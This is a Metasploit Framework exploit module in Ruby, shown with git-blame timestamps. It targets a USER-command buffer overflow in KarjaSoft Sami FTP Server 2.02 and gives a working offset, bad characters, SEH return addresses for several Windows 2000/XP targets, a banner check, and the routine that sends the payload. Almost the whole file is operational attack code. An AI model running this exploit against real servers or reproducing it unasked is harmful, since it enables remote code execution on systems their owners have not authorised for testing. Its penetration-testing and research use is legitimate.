metasploit-framework/modules/exploits/windows/ftp/sami_ftpd_user.rb

98 lines
2.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = NormalRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
'Description' => %q{
This module exploits the KarjaSoft Sami FTP Server version 2.02
by sending an excessively long USER string. The stack is overwritten
when the administrator attempts to view the FTP logs. Therefore, this exploit
is passive and requires end-user interaction. Keep this in mind when selecting
payloads. When the server is restarted, it will re-execute the exploit until
the logfile is manually deleted via the file system.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Stance' => Msf::Exploit::Stance::Passive,
'References' =>
[
# This exploit appears to have been reported multiple times.
[ 'CVE', '2006-0441'],
[ 'CVE', '2006-2212'],
[ 'OSVDB', '25670'],
[ 'BID', '16370'],
[ 'BID', '22045'],
[ 'BID', '17835'],
[ 'EDB', '1448'],
[ 'EDB', '1452'],
[ 'EDB', '1462'],
[ 'EDB', '3127'],
[ 'EDB', '3140']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20\xff",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
],
'DisclosureDate' => 'Jan 24 2006'))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(21),
], self.class)
end
2013-08-30 21:28:54 +00:00
def check
connect
banner = sock.get_once(-1, 3)
2013-08-30 21:28:54 +00:00
disconnect
if (banner =~ /Sami FTP Server 2\.0\.2/)
return Exploit::CheckCode::Appears
2013-08-30 21:28:54 +00:00
end
return Exploit::CheckCode::Safe
end
2013-08-30 21:28:54 +00:00
def exploit
connect
2013-08-30 21:28:54 +00:00
sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)
2013-08-30 21:28:54 +00:00
login = "USER #{sploit}\r\n"
login << "PASS " + Rex::Text.rand_char(payload_badchars)
2013-08-30 21:28:54 +00:00
sock.put(login + "\r\n")
2013-08-30 21:28:54 +00:00
handler
disconnect
end
end